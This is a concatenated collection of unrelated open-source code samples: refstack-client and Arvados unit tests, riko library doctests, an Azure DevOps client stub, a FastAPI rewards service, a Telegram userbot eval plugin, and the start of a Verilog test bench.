def test_run_tempest_nonexisting_directory(self):
"""
Test when the Tempest directory does not exist.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
client.tempest_dir = "/does/not/exist"
self.assertRaises(SystemExit, client.test)
def test_run_tempest_result_tag(self):
"""
Check that the result JSON file is renamed with the result file tag
when the --result-file-tag argument is passed in.
"""
argv = self.mock_argv(verbose='-vv',
test_cases='tempest.api.compute')
argv.insert(2, '--result-file-tag')
argv.insert(3, 'my-test')
args = rc.parse_cli_args(argv)
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
mock_popen = self.patch(
'refstack_client.refstack_client.subprocess.Popen',
return_value=MagicMock(returncode=0))
self.patch("os.path.isfile", return_value=True)
self.mock_data()
client.get_passed_tests = MagicMock(return_value=['test'])
client._save_json_results = MagicMock()
client._get_keystone_config = MagicMock(
return_value=self.v2_config)
client._get_cpid_from_keystone = MagicMock(
return_value='test-id')
client.test()
mock_popen.assert_called_with(
['%s/tools/with_venv.sh' % self.test_path, 'tempest', 'run',
'--serial', '--regex', 'tempest.api.compute'],
stderr=None
)
# Since '1' is in the next-stream file, we expect the JSON output file
# to be 'my-test-1.json'.
expected_file = os.path.join(self.test_path, '.testrepository',
'my-test-1.json')
client._save_json_results.assert_called_with(mock.ANY, expected_file)
def test_failed_run(self):
"""
Test when the Tempest script returns a non-zero exit code.
"""
self.patch('refstack_client.refstack_client.subprocess.Popen',
return_value=MagicMock(returncode=1))
args = rc.parse_cli_args(self.mock_argv(verbose='-vv'))
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
self.mock_data()
client.logger.warning = MagicMock()
client._get_keystone_config = MagicMock(
return_value=self.v2_config)
client._get_cpid_from_keystone = MagicMock()
client.test()
self.assertTrue(client.logger.warning.called)
def test_upload(self):
"""
Test that the upload command runs as expected.
"""
upload_file_path = self.test_path + "/.testrepository/0.json"
args = rc.parse_cli_args(
self.mock_argv(command='upload', priv_key='rsa_key') +
[upload_file_path])
client = rc.RefstackClient(args)
client.post_results = MagicMock()
client.upload()
expected_json = {
'duration_seconds': 0,
'cpid': 'test-id',
'results': [
{'name': 'tempest.passed.test'},
{'name': 'tempest.tagged_passed.test',
'uuid': '0146f675-ffbd-4208-b3a4-60eb628dbc5e'}
]
}
client.post_results.assert_called_with('http://127.0.0.1',
expected_json,
sign_with='rsa_key')
def test_subunit_upload(self):
"""
Test that the subunit upload command runs as expected.
"""
upload_file_path = self.test_path + "/.testrepository/0"
args = rc.parse_cli_args(
self.mock_argv(command='upload-subunit', priv_key='rsa_key') +
['--keystone-endpoint', 'http://0.0.0.0:5000/v2.0'] +
[upload_file_path])
client = rc.RefstackClient(args)
client.post_results = MagicMock()
client.upload_subunit()
expected_json = {
'duration_seconds': 0,
'cpid': hashlib.md5('0.0.0.0'.encode('utf-8')).hexdigest(),
'results': [
{'name': 'tempest.passed.test'},
{'name': 'tempest.tagged_passed.test',
'uuid': '0146f675-ffbd-4208-b3a4-60eb628dbc5e'}
]
}
client.post_results.assert_called_with('http://127.0.0.1',
expected_json,
sign_with='rsa_key')
def test_upload_nonexisting_file(self):
"""
Test when the file to be uploaded does not exist.
"""
upload_file_path = self.test_path + "/.testrepository/foo.json"
args = rc.parse_cli_args(['upload', upload_file_path,
'--url', 'http://api.test.org'])
client = rc.RefstackClient(args)
self.assertRaises(SystemExit, client.upload)
def test_yield_results(self):
"""
Test the yield_results method, ensuring that results are retrieved.
"""
args = rc.parse_cli_args(self.mock_argv(command='list'))
client = rc.RefstackClient(args)
expected_response = {
"pagination": {
"current_page": 1,
"total_pages": 1
},
"results": [
{
"cpid": "42",
"created_at": "2015-04-28 13:57:05",
"test_id": "1",
"url": "http://127.0.0.1:8000/output.html?test_id=1"
},
{
"cpid": "42",
"created_at": "2015-04-28 13:57:05",
"test_id": "2",
"url": "http://127.0.0.1:8000/output.html?test_id=2"
}]}
@httmock.urlmatch(netloc=r'(.*\.)?127.0.0.1$', path='/v1/results/')
def refstack_api_mock(url, request):
return json.dumps(expected_response)
with httmock.HTTMock(refstack_api_mock):
results = client.yield_results("http://127.0.0.1")
self.assertEqual(expected_response['results'], next(results))
# Since Python3.7 StopIteration exceptions are transformed into
# RuntimeError (PEP 479):
# https://docs.python.org/3/whatsnew/3.7.html
self.assertRaises((StopIteration, RuntimeError), next, results)
@mock.patch('six.moves.input', side_effect=KeyboardInterrupt)
@mock.patch('sys.stdout', new_callable=MagicMock)
def test_list(self, mock_stdout, mock_input):
args = rc.parse_cli_args(self.mock_argv(command='list'))
client = rc.RefstackClient(args)
results = [[{"cpid": "42",
"created_at": "2015-04-28 13:57:05",
"test_id": "1",
"url": "http://127.0.0.1:8000/output.html?test_id=1"},
{"cpid": "42",
"created_at": "2015-04-28 13:57:05",
"test_id": "2",
"url": "http://127.0.0.1:8000/output.html?test_id=2"}]]
mock_results = MagicMock()
mock_results.__iter__.return_value = results
client.yield_results = MagicMock(return_value=mock_results)
client.list()
self.assertTrue(mock_stdout.write.called)
def test_sign_pubkey(self):
"""
Test that the test command will run the tempest script and call
post_results when the --upload argument is passed in.
"""
args = rc.parse_cli_args(['sign',
os.path.join(self.test_path, 'rsa_key')])
client = rc.RefstackClient(args)
pubkey, signature = client._sign_pubkey()
self.assertTrue(pubkey.decode('utf8').startswith('ssh-rsa AAAA'))
self.assertTrue(signature.decode('utf8').startswith('413cb954'))
def test_set_env_params(self):
"""
Test that the environment variables are correctly set.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
client._prep_test()
conf_dir = os.path.abspath(os.path.dirname(self.conf_file_name))
conf_file = os.path.basename(self.conf_file_name)
self.assertEqual(os.environ.get('TEMPEST_CONFIG_DIR'), conf_dir)
self.assertEqual(os.environ.get('TEMPEST_CONFIG'), conf_file)
@mock.patch('refstack_client.list_parser.TestListParser.'
'create_include_list')
def test_run_tempest_with_empty_test_list(self, mock_include_list):
"""Test that refstack-client can handle an empty test list file."""
argv = self.mock_argv(verbose='-vv')
argv.extend(['--test-list', 'foo.txt'])
args = rc.parse_cli_args(argv)
client = rc.RefstackClient(args)
self.mock_data()
self.patch(
'refstack_client.refstack_client.subprocess.Popen',
return_value=MagicMock(returncode=0))
client._get_keystone_config = MagicMock(return_value=self.v2_config)
client.tempest_dir = self.test_path
self.patch("os.path.isfile", return_value=True)
empty_file = tempfile.NamedTemporaryFile()
mock_include_list.return_value = empty_file.name
self.assertRaises(SystemExit, client.test)
def test_run_tempest_with_non_exist_test_list_file(self):
"""Test that refstack-client runs with a nonexistent test list file."""
argv = self.mock_argv(verbose='-vv')
argv.extend(['--test-list', 'foo.txt'])
args = rc.parse_cli_args(argv)
client = rc.RefstackClient(args)
self.mock_data()
self.patch(
'refstack_client.list_parser.TestListParser._get_tempest_test_ids',
return_value={'foo': ''})
self.patch(
'refstack_client.refstack_client.subprocess.Popen',
return_value=MagicMock(returncode=0))
client._get_keystone_config = MagicMock(return_value=self.v2_config)
client.tempest_dir = self.test_path
self.assertRaises(IOError, client.test)
|
StarcoderdataPython
|
3237742
|
# -*- coding: utf-8 -*-
# vim: sw=4:ts=4:expandtab
"""
README examples
~~~~~~~~~~~~~~~
Word Count
>>> import itertools as it
>>> from riko import get_path
>>> from riko.modules import fetchpage, strreplace, tokenizer, count
>>>
>>> ### Set the pipe configurations ###
>>> #
>>> # Notes:
>>> # - `get_path` just looks up files in the `data` directory to simplify
>>> # testing
>>> # - the `detag` option will strip all html tags from the result
>>> url = get_path('users.jyu.fi.html')
>>> fetch_conf = {
... 'url': url, 'start': '<body>', 'end': '</body>', 'detag': True}
>>> replace_conf = {'rule': {'find': '\\n', 'replace': ' '}}
>>> replace_kwargs = {'conf': replace_conf, 'assign': 'content'}
>>> token_kwargs = {'conf': {'delimiter': ' '}, 'emit': True}
>>>
>>> ### Create a workflow ###
>>> #
>>> # The following workflow will:
>>> # 1. fetch the url and return the content between the body tags
>>> # 2. replace newlines with spaces
>>> # 3. tokenize (split) the content by spaces, i.e., yield words
>>> # 4. count the words
>>> #
>>> # Note: because `fetchpage` and `strreplace` each return an iterator of
>>> # just one item, we can safely call `next` without fear of loosing data
>>> page = next(fetchpage.pipe(conf=fetch_conf))
>>> replaced = next(strreplace.pipe(page, **replace_kwargs))
>>> words = tokenizer.pipe(replaced, **token_kwargs)
>>> counts = count.pipe(words, conf={'count_key': 'content'})
>>> next(counts) == {'$': 2}
True
>>> next(counts) == {'$Date:': 1}
True
>>> next(counts) == {'$Revision:': 1}
True
>>> ### Alternatively, create a SyncPipe workflow ###
>>> #
>>> # `SyncPipe` is a workflow convenience class that enables method
>>> # chaining and parallel processing
>>> from riko.collections import SyncPipe
>>>
>>> stream = (SyncPipe('fetchpage', conf=fetch_conf)
... .strreplace(conf=replace_conf, assign='content')
... .tokenizer(conf={'delimiter': ' '}, emit=True)
... .count(conf={'count_key': 'content'})
... .output)
>>>
>>> next(stream) == {'$': 2}
True
Fetching feeds
>>> from itertools import chain
>>> from riko import get_path
>>> from riko.modules import (
... fetch, fetchdata, fetchsitefeed, feedautodiscovery)
>>>
>>> ### Fetch a url ###
>>> stream = fetchdata.pipe(conf={'url': 'http://site.com/file.xml'})
>>>
>>> ### Fetch a filepath ###
>>> #
>>> # Note: `get_path` just looks up files in the `data` directory
>>> # to simplify testing
>>> conf = {'url': get_path('quote.json')}
>>> stream = fetchdata.pipe(conf=conf)
>>>
>>> # Same thing, but now memoize the url response
>>> conf['memoize'] = True
>>> stream = fetchdata.pipe(conf=conf)
>>>
>>> ### View the fetched data ###
>>> item = next(stream)
>>> 0.7841 < item['rates']['GBP'] < 0.7842
True
>>> ### Fetch an rss feed ###
>>> stream = fetch.pipe(conf={'url': get_path('feed.xml')})
>>>
>>> ### Fetch the first rss feed found ###
>>> stream = fetchsitefeed.pipe(conf={'url': get_path('cnn.html')})
>>>
>>> ### Find all rss links and fetch the feeds ###
>>> url = get_path('bbc.html')
>>> entries = feedautodiscovery.pipe(conf={'url': url})
>>> urls = [e['link'] for e in entries]
>>>
>>> stream = chain.from_iterable(
... fetch.pipe(conf={'url': url}) for url in urls)
>>>
>>> ### Alternatively, create a SyncCollection ###
>>> #
>>> # `SyncCollection` is a url fetching convenience class with support for
>>> # parallel processing
>>> from riko.collections import SyncCollection
>>>
>>> sources = [{'url': url} for url in urls]
>>> stream = SyncCollection(sources).fetch()
>>>
>>> ### View the fetched rss feed(s) ###
>>> #
>>> # Note: regardless of how you fetch an rss feed, it will have the same
>>> # structure
>>> intersection = [
... 'author', 'author.name', 'author.uri', 'dc:creator', 'id', 'link',
... 'pubDate', 'summary', 'title', 'y:id', 'y:published', 'y:title']
>>> item = next(stream)
>>> set(item).issuperset(intersection)
True
>>> item['title'] == 'Using NFC tags in the car'
True
>>> item['author'] == '<NAME>'
True
>>> item['link'] == 'http://www.greenhughes.com/content/using-nfc-tags-car'
True
Synchronous processing
>>> from itertools import chain
>>> from riko import get_path
>>> from riko.modules import fetch, filter, subelement, regex, sort
>>>
>>> ### Set the pipe configurations ###
>>> #
>>> # Note: `get_path` just looks up files in the `data` directory to
>>> # simplify testing
>>> fetch_conf = {'url': get_path('feed.xml')}
>>> filter_rule = {
... 'field': 'y:published', 'op': 'before', 'value': '2/5/09'}
>>> sub_conf = {'path': 'content.value'}
>>> sub_kwargs = {'conf': sub_conf, 'emit': True}
>>> match = r'(.*href=")([\\w:/.@]+)(".*)'
>>> regex_rule = {'field': 'content', 'match': match, 'replace': '$2'}
>>> regex_conf = {'rule': regex_rule}
>>> sort_conf = {'rule': {'sort_key': 'content', 'sort_dir': 'desc'}}
>>>
>>> ### Create a workflow ###
>>> #
>>> # The following workflow will:
>>> # 1. fetch the rss feed
>>> # 2. filter for items published before 2/5/2009
>>> # 3. extract the path `content.value` from each feed item
>>> # 4. replace the extracted text with the last href url contained
>>> # within it
>>> # 5. reverse sort the items by the replaced url
>>> #
>>> # Note: sorting is not lazy so take caution when using this pipe
>>> stream = fetch.pipe(conf=fetch_conf)
>>> filtered = filter.pipe(stream, conf={'rule': filter_rule})
>>> extracted = (subelement.pipe(i, **sub_kwargs) for i in filtered)
>>> flat_extract = chain.from_iterable(extracted)
>>> matched = (regex.pipe(i, conf=regex_conf) for i in flat_extract)
>>> flat_match = chain.from_iterable(matched)
>>> sorted_match = sort.pipe(flat_match, conf=sort_conf)
>>> next(sorted_match) == {'content': 'mailto:<EMAIL>'}
True
>>> ### Alternatively, create a SyncPipe workflow ###
>>> #
>>> # `SyncPipe` is a workflow convenience class that enables method
>>> # chaining, parallel processing, and eliminates the manual `map` and
>>> # `chain` steps
>>> from riko.collections import SyncPipe
>>>
>>> stream = (SyncPipe('fetch', conf=fetch_conf)
... .filter(conf={'rule': filter_rule})
... .subelement(conf=sub_conf, emit=True)
... .regex(conf={'rule': regex_rule})
... .sort(conf=sort_conf)
... .output)
>>>
>>> next(stream) == {'content': 'mailto:<EMAIL>'}
True
Parallel processing
>>> from riko import get_path
>>> from riko.collections import SyncPipe
>>>
>>> ### Set the pipe configurations ###
>>> #
>>> # Notes `get_path` just looks up files in the `data` directory to
>>> # simplify testing
>>> url = get_path('feed.xml')
>>> sub_conf = {'path': 'content.value'}
>>> match = r'(.*href=")([\\w:/.@]+)(".*)'
>>> regex_rule = {'field': 'content', 'match': match, 'replace': '$2'}
>>> filter_rule = {'field': 'content', 'op': 'contains', 'value': 'file'}
>>> strtransform_conf = {'rule': {'transform': 'rstrip', 'args': '/'}}
>>>
>>> ### Create a parallel SyncPipe workflow ###
>>> #
>>> # The following workflow will:
>>> # 1. fetch the rss feed
>>> # 3. extract the path `content.value` from each feed item
>>> # 4. replace the extracted text with the last href url contained
>>> # within it
>>> # 5. filter for items with local file urls (which happen to be rss
>>> # feeds)
>>> # 6. strip any trailing `\\` from the url
>>> # 7. remove duplicate urls
>>> # 8. fetch each rss feed
>>> # 9. Merge the rss feeds into a list
>>> stream = (SyncPipe('fetch', conf={'url': url}, parallel=True)
... .subelement(conf=sub_conf, emit=True)
... .regex(conf={'rule': regex_rule})
... .filter(conf={'rule': filter_rule})
... .strtransform(conf=strtransform_conf)
... .uniq(conf={'uniq_key': 'strtransform'})
... .fetch(conf={'url': {'subkey': 'strtransform'}})
... .list)
>>>
>>> len(stream)
25
Asynchronous processing
>>> from riko import get_path
>>> from riko.bado import coroutine, react, _issync, _isasync
>>> from riko.bado.mock import FakeReactor
>>> from riko.collections import AsyncPipe
>>>
>>> ### Set the pipe configurations ###
>>> #
>>> # Notes:
>>> # - `get_path` just looks up files in the `data` directory to simplify
>>> # testing
>>> # - the `dotall` option is used to match `.*` across newlines
>>> url = get_path('feed.xml')
>>> sub_conf = {'path': 'content.value'}
>>> match = r'(.*href=")([\\w:/.@]+)(".*)'
>>> regex_rule = {
... 'field': 'content', 'match': match, 'replace': '$2',
... 'dotall': True}
>>> filter_rule = {'field': 'content', 'op': 'contains', 'value': 'file'}
>>> strtransform_conf = {'rule': {'transform': 'rstrip', 'args': '/'}}
>>>
>>> ### Create an AsyncPipe workflow ###
>>> #
>>> # See `Parallel processing` above for the steps this performs
>>> @coroutine
... def run(reactor):
... stream = yield (AsyncPipe('fetch', conf={'url': url})
... .subelement(conf=sub_conf, emit=True)
... .regex(conf={'rule': regex_rule})
... .filter(conf={'rule': filter_rule})
... .strtransform(conf=strtransform_conf)
... .uniq(conf={'uniq_key': 'strtransform'})
... .fetch(conf={'url': {'subkey': 'strtransform'}})
... .list)
...
... print(len(stream))
...
>>> if _issync:
... 25
... else:
... try:
... react(run, _reactor=FakeReactor())
... except SystemExit:
... pass
25
Design Principles
# an operator
>>> from riko.modules.reverse import pipe
>>>
>>> stream = [{'title': 'riko pt. 1'}, {'title': 'riko pt. 2'}]
>>> next(pipe(stream)) == {'title': 'riko pt. 2'}
True
# a transformer
>>> import ctypes
>>> from riko.modules.hash import pipe
>>>
>>> _hash = ctypes.c_uint(hash('riko pt. 1')).value
>>> item = {'title': 'riko pt. 1'}
>>> stream = pipe(item, field='title')
>>> next(stream) == {'title': 'riko pt. 1', 'hash': _hash}
True
>>> from riko.modules.tokenizer import pipe
>>>
>>> item = {'title': 'riko pt. 1'}
>>> tokenizer_conf = {'delimiter': ' '}
>>> stream = pipe(item, conf=tokenizer_conf, field='title')
>>> next(stream) == {
... 'title': 'riko pt. 1',
... 'tokenizer': [
... {'content': 'riko'},
... {'content': 'pt.'},
... {'content': '1'}]}
True
>>> # In this case, if we just want the result, we can `emit` it instead
>>> stream = pipe(item, conf=tokenizer_conf, field='title', emit=True)
>>> next(stream) == {'content': 'riko'}
True
# an aggregator
>>> from riko.modules.count import pipe
>>>
>>> stream = [{'title': 'riko pt. 1'}, {'title': 'riko pt. 2'}]
>>> next(pipe(stream)) == {'count': 2}
True
# a source
>>> from riko.modules.itembuilder import pipe
>>>
>>> attrs = {'key': 'title', 'value': 'riko pt. 1'}
>>> next(pipe(conf={'attrs': attrs})) == {'title': 'riko pt. 1'}
True
# check metadata
>>> from riko.modules import fetchpage, count
>>>
>>> if _isasync:
... async_resp = ('processor', 'fetchpage', 'source')
... else:
... async_resp = (None, None, None)
>>>
>>> async_pdict = fetchpage.async_pipe.__dict__
>>> (async_pdict.get('type'), async_pdict.get('name')) == async_resp[:2]
True
>>> async_pdict.get('sub_type') == async_resp[2]
True
>>> pdict = count.pipe.__dict__
>>> sync_resp = ('operator', 'count', 'aggregator')
>>> (pdict['type'], pdict['name'], pdict['sub_type']) == sync_resp
True
# SyncPipe usage
>>> from riko.collections import SyncPipe
>>>
>>> _hash = ctypes.c_uint(hash("Let's talk about riko!")).value
>>> attrs = [
... {'key': 'title', 'value': 'riko pt. 1'},
... {'key': 'content', 'value': "Let's talk about riko!"}]
>>> sync_pipe = SyncPipe('itembuilder', conf={'attrs': attrs})
>>> sync_pipe.hash().list[0] == {
... 'title': 'riko pt. 1',
... 'content': "Let's talk about riko!",
... 'hash': _hash}
True
# Alternate conf usage
>>> from riko import get_path
>>> from riko.modules.fetch import pipe
>>>
>>> intersection = [
... 'author', 'author.name', 'author.uri', 'dc:creator', 'id', 'link',
... 'pubDate', 'summary', 'title', 'y:id', 'y:published', 'y:title']
>>> conf = {'url': {'subkey': 'url'}}
>>> result = pipe({'url': get_path('feed.xml')}, conf=conf)
>>> set(next(result)).issuperset(intersection)
True
"""
from pprint import pprint
from riko.collections import SyncPipe
attrs = [
{'key': 'title', 'value': 'riko pt. 1'},
{'key': 'content', 'value': "Let's talk about riko!"}]
ib_conf = {'attrs': attrs}
def pipe(test=False):
flow = SyncPipe('itembuilder', conf=ib_conf, test=test).hash()
for i in flow.output:
pprint(i)
|
StarcoderdataPython
|
4895481
|
<filename>sdk/python/tests/test_errors.py
#!/usr/bin/env python
import traceback
import unittest
import arvados.errors as arv_error
import arvados_testutil as tutil
class KeepRequestErrorTestCase(unittest.TestCase):
REQUEST_ERRORS = [
('http://keep1.zzzzz.example.org/', IOError("test IOError")),
('http://keep3.zzzzz.example.org/', MemoryError("test MemoryError")),
('http://keep5.zzzzz.example.org/',
arv_error.HttpError(500, "Internal Server Error")),
('http://keep7.zzzzz.example.org/', IOError("second test IOError")),
]
def check_get_message(self, *args):
test_exc = arv_error.KeepRequestError("test message", *args)
self.assertEqual("test message", test_exc.message)
def test_get_message_with_request_errors(self):
self.check_get_message(self.REQUEST_ERRORS[:])
def test_get_message_without_request_errors(self):
self.check_get_message()
def check_get_request_errors(self, *args):
expected = dict(args[0]) if args else {}
test_exc = arv_error.KeepRequestError("test service exceptions", *args)
self.assertEqual(expected, test_exc.request_errors())
def test_get_request_errors(self):
self.check_get_request_errors(self.REQUEST_ERRORS[:])
def test_get_request_errors_none(self):
self.check_get_request_errors({})
def test_empty_exception(self):
test_exc = arv_error.KeepRequestError()
self.assertFalse(test_exc.message)
self.assertEqual({}, test_exc.request_errors())
def traceback_str(self, exc):
return traceback.format_exception_only(type(exc), exc)[-1]
def test_traceback_str_without_request_errors(self):
message = "test plain traceback string"
test_exc = arv_error.KeepRequestError(message)
exc_report = self.traceback_str(test_exc)
self.assertTrue(exc_report.startswith("KeepRequestError: "))
self.assertIn(message, exc_report)
def test_traceback_str_with_request_errors(self):
message = "test traceback shows Keep services"
test_exc = arv_error.KeepRequestError(message, self.REQUEST_ERRORS[:])
exc_report = self.traceback_str(test_exc)
self.assertTrue(exc_report.startswith("KeepRequestError: "))
for expect_substr in [message, "raised IOError", "raised MemoryError",
"test MemoryError", "second test IOError",
"responded with 500 Internal Server Error"]:
self.assertIn(expect_substr, exc_report)
# Assert the report maintains order of listed services.
last_index = -1
for service_key, _ in self.REQUEST_ERRORS:
service_index = exc_report.find(service_key)
self.assertGreater(service_index, last_index)
last_index = service_index
|
StarcoderdataPython
|
11309385
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from msrest import Serializer, Deserializer
from ...client import Client
from . import models
class AuthorizationClient(Client):
"""Authorization
:param str base_url: Service URL
:param Authentication creds: Authenticated credentials.
"""
def __init__(self, base_url=None, creds=None):
super(AuthorizationClient, self).__init__(base_url, creds)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
resource_area_identifier = '2e426be0-da4d-48c4-9178-978da8562255'
|
StarcoderdataPython
|
1818505
|
import logging
import os
from typing import List, Optional
import sentry_sdk
import uvicorn
from dotenv import load_dotenv
from fastapi import Depends, FastAPI, HTTPException
from fastapi_utils.tasks import repeat_every
from sqlalchemy.orm import Session
from . import crud, models, schemas
from .config import config
from .database import SessionLocal, engine, get_db, get_fastapi_sessionmaker
from .indexer import Indexer
load_dotenv()
LOGLEVEL = os.environ.get("LOGLEVEL", "INFO").upper()
logging.basicConfig(level=LOGLEVEL)
models.Base.metadata.create_all(bind=engine)
for expected_env in [
"SUBGRAPH_URL",
"REWARDS_BUCKET",
"ENVIRONMENT",
]:
if expected_env not in os.environ:
raise ValueError(f"Missing environment variable {expected_env}")
SUBGRAPH_URL = os.environ.get("SUBGRAPH_URL")
REWARDS_BUCKET = os.environ.get("REWARDS_BUCKET")
ENVIRONMENT = os.environ.get("ENVIRONMENT")
SENTRY_DSN = os.environ.get("SENTRY_DSN")
app = FastAPI()
if SENTRY_DSN is not None:
sentry_sdk.init(
SENTRY_DSN,
# Set traces_sample_rate to 1.0 to capture 100%
# of transactions for performance monitoring.
# We recommend adjusting this value in production.
traces_sample_rate=1.0,
environment=ENVIRONMENT,
)
@app.on_event("startup")
@repeat_every(seconds=5, raise_exceptions=True)
def index_root_task() -> None:
sessionmaker = get_fastapi_sessionmaker()
with sessionmaker.context_session() as db:
try:
Indexer(SUBGRAPH_URL, config[ENVIRONMENT]["archived_reward_programs"]).run(
db=db, storage_location=REWARDS_BUCKET
)
except Exception as e:
logging.error(e)
def param(skip: int = 0, limit: int = 100):
return {"skip": skip, "limit": limit}
@app.get("/about/")
async def about():
return {
"subgraph_url": SUBGRAPH_URL,
"rewards_bucket": REWARDS_BUCKET,
"environment": ENVIRONMENT,
}
@app.get("/")
async def root():
return {"status": "ok"}
@app.get("/merkle-proofs/{payee}", response_model=List[schemas.Proof])
def read_proofs(
db: Session = Depends(get_db),
proof_filter: dict = Depends(schemas.ProofFilter),
param: dict = Depends(param),
):
return crud.get_proofs(db, proof_filter=proof_filter, param=param)
if __name__ == "__main__":
uvicorn.run("cardpay_reward_api.main:app", host="0.0.0.0", log_level="info")
|
StarcoderdataPython
|
5014069
|
<reponame>ALiwoto/SCP-5170
# https://greentreesnakes.readthedocs.io/
# https://gitlab.com/blankX/sukuinote/-/blob/master/sukuinote/plugins/pyexec.py
import ast
import sys
import html
import inspect
import asyncio
from shortuuid import ShortUUID
from io import StringIO, BytesIO
from scp import user, bot
from scp.utils.selfInfo import info
from scp.utils.parser import getMediaAttr
exec_tasks = {}
@user.on_message(
~user.filters.forwarded
& ~user.filters.sticker
& ~user.filters.via_bot
& ~user.filters.edited
& user.filters.me
& user.filters.command(
'eval',
prefixes=user._config.get('scp-5170', 'prefixes').split(),
),
)
async def pyexec(client: user, message: user.types.Message):
code = message.text.split(None, 1)[1]
tree = ast.parse(code)
obody = tree.body
body = obody.copy()
body.append(ast.Return(ast.Name('_ueri', ast.Load())))
try:
exx = _gf(body)
except SyntaxError as ex:
if ex.msg != "'return' with value in async generator":
raise
exx = _gf(obody)
rnd_id = '#' + str(ShortUUID().random(length=5))
reply = await message.reply_text(
f'Executing <code>{rnd_id}</code>',
quote=True,
)
oasync_obj = exx(
client,
client,
message,
message,
reply,
message.reply_to_message,
message.reply_to_message,
UniqueExecReturnIdentifier,
)
if inspect.isasyncgen(oasync_obj):
async def async_obj():
return [i async for i in oasync_obj]
else:
async def async_obj():
to_return = [await oasync_obj]
return [] if to_return == [
UniqueExecReturnIdentifier,
] else to_return
stdout = sys.stdout
stderr = sys.stderr
wrapped_stdout = StringIO()
try:
sys.stdout = sys.stderr = wrapped_stdout
task = asyncio.create_task(async_obj())
exec_tasks[rnd_id] = task
try:
returned = await task
except Exception as err:
returned = err
return await reply.edit_text(
user.md.KanTeXDocument(
user.md.Section('Error:', user.md.Code(err)),
),
)
except asyncio.CancelledError:
sys.stdout = stdout
sys.stderr = stderr
exec_tasks.pop(rnd_id, None)
return await reply.edit_text(
user.md.KanTeXDocument(
user.md.Section(
'Task Cancelled:',
user.md.Code(f'{rnd_id} has been canceled.'),
),
),
)
finally:
sys.stdout = stdout
sys.stderr = stderr
exec_tasks.pop(rnd_id, None)
wrapped_stdout.seek(0)
output = ''
wrapped_stdout_text = wrapped_stdout.read().strip()
if wrapped_stdout_text:
output += f'<code>{html.escape(wrapped_stdout_text)}</code>\n'
for i in returned:
output += f'<code>{html.escape(str(i).strip())}</code>\n'
if not output.strip():
output = 'Success'
if len(output) > 4096:
out = wrapped_stdout_text + '\n'
for i in returned:
out += str(i).strip() + '\n'
f = BytesIO(out.strip().encode('utf-8'))
f.name = 'output.txt'
await asyncio.gather(reply.delete(), message.reply_document(f))
else:
await reply.edit_text(
user.md.KanTeXDocument(
user.md.Section('Output:', user.md.Code(output)),
),
)
@user.on_message(user.filters.me & user.command('listEval'))
async def listexec(_, message: user.types.Message):
try:
x = await user.get_inline_bot_results(
info['_bot_username'],
'_listEval',
)
except (
user.exceptions.PeerIdInvalid,
user.exceptions.BotResponseTimeout,
):
return await message.reply('no tasks', quote=True)
for m in x.results:
await message.reply_inline_bot_result(x.query_id, m.id, quote=True)
@bot.on_inline_query(
user.filters.user(info['_user_id'])
& user.filters.regex('^_listEval'),
)
async def _(_, query: user.types.InlineQuery):
buttons = [[
user.types.InlineKeyboardButton(
text='cancel all',
callback_data='cancel_eval_all',
),
]]
for x, _ in exec_tasks.items():
buttons.append(
[
user.types.InlineKeyboardButton(
text=x, callback_data=f'cancel_eval_{x}',
),
],
)
await query.answer(
results=[
user.types.InlineQueryResultArticle(
title='list eval tasks',
input_message_content=user.types.InputTextMessageContent(
user.md.KanTeXDocument(
user.md.Section(
'ListEvalTasks',
user.md.KeyValueItem(
'Tasks Running',
str(len(exec_tasks)),
),
),
),
),
reply_markup=user.types.InlineKeyboardMarkup(buttons),
),
],
cache_time=0,
)
@bot.on_callback_query(
user.filters.user(info['_user_id'])
& user.filters.regex('^cancel_'),
)
async def cancelexec(_, query: user.types.CallbackQuery):
Type = query.data.split('_')[1]
taskID = query.data.split('_')[2]
if Type == 'eval':
if taskID == 'all':
for _, i in exec_tasks.items():
i.cancel()
return await query.edit_message_text(
'All tasks has been cancelled',
)
else:
try:
task = exec_tasks.get(taskID)
except IndexError:
return
if not task:
return await query.answer(
'Task does not exist anymore',
show_alert=True,
)
task.cancel()
return await query.edit_message_text(f'{taskID} has been cancelled')
@user.on_message(
user.sudo
& user.command('GetID'),
)
async def _(_, message: user.types.Message):
message = message.reply_to_message or message
media = getMediaAttr(
message,
[
'audio',
'document',
'photo',
'sticker',
'animation',
'video',
'voice',
'video_note',
'new_chat_photo',
],
)
appendable = [
user.md.KeyValueItem(
user.md.Bold('chatID'),
user.md.Code(message.chat.id),
),
user.md.KeyValueItem(
user.md.Bold('fromUserID'),
user.md.Code(message.from_user.id),
),
]
text = user.md.Section('getID')
if not media:
for a in appendable:
text.append(a)
return await message.reply(user.md.KanTeXDocument(text))
medias = [
user.md.KeyValueItem(
user.md.Bold('fileID'),
user.md.Code(media.file_id),
),
user.md.KeyValueItem(
user.md.Bold('fileUniqueID'),
user.md.Code(media.file_unique_id),
),
]
for media in medias:
appendable.append(media)
for a in appendable:
text.append(a)
return await message.reply(user.md.KanTeXDocument(text))
def _gf(body):
func = ast.AsyncFunctionDef(
'ex',
ast.arguments(
[],
[
ast.arg(
i, None, None,
) for i in [
'c',
'client',
'm',
'message',
'executing',
'r',
'reply',
'_ueri',
]
],
None,
[],
[],
None,
[],
),
body,
[],
None,
None,
)
ast.fix_missing_locations(func)
mod = ast.parse('')
mod.body = [func]
fl = locals().copy()
exec(compile(mod, '<ast>', 'exec'), globals(), fl)
return fl['ex']
class UniqueExecReturnIdentifier:
pass
|
StarcoderdataPython
|
3289457
|
from __future__ import absolute_import
from __future__ import print_function
import veriloggen
import thread_fixed_ram_initvals
expected_verilog = """
module test;
reg CLK;
reg RST;
blinkled
uut
(
.CLK(CLK),
.RST(RST)
);
initial begin
$dumpfile("uut.vcd");
$dumpvars(0, uut);
end
initial begin
CLK = 0;
forever begin
#5 CLK = !CLK;
end
end
initial begin
RST = 0;
#100;
RST = 1;
#100;
RST = 0;
